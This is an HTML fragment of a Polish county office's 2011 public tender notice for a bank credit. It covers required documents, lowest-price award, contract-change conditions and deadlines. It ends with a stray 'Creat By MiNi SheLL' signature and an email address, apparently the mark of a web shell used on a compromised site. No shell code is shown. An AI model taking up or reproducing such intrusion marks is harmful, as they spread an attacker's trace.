<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz ofertowy - załącznik nr 1 do SIWZ. 
2.	Wypełniony formularz cenowy - załącznik nr 2 do SIWZ.
3.          Zezwolenie prezesa NBP na wykonywanie czynności bankowych lub inny stosowny dokument uprawniający do wykonywania tych czynności,
4.	Pełnomocnictwo, (jeżeli upoważniono osobę (-y) do reprezentacji).
5.	Dowód wniesienia wadium.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany umowy kredytowej w części dotyczącej zmiany harmonogramu spłaty kredytu w przypadku niewykorzystania pełnej kwoty kredytu, częściowej spłaty kredytu w roku bieżącym, bądź zawieszenia okresu spłaty do 3 miesięcy. Określone wyżej zdarzenia stanowić będą warunki w rozumieniu art. 144 ustawy Pzp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.fsd.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Strzelcach Krajeńskich ul. Ks. St. Wyszyńskiego 7 66-500 Strzelce Krajeńskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.11.2011 godzina 13:00, miejsce: Starostwo Powiatowe w Strzelcach Krajeńskich ul. Ks. St. Wyszyńskiego 7 66-500 Strzelce Krajeńskie w sekretariacie zamawiającego - pokój nr 103..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com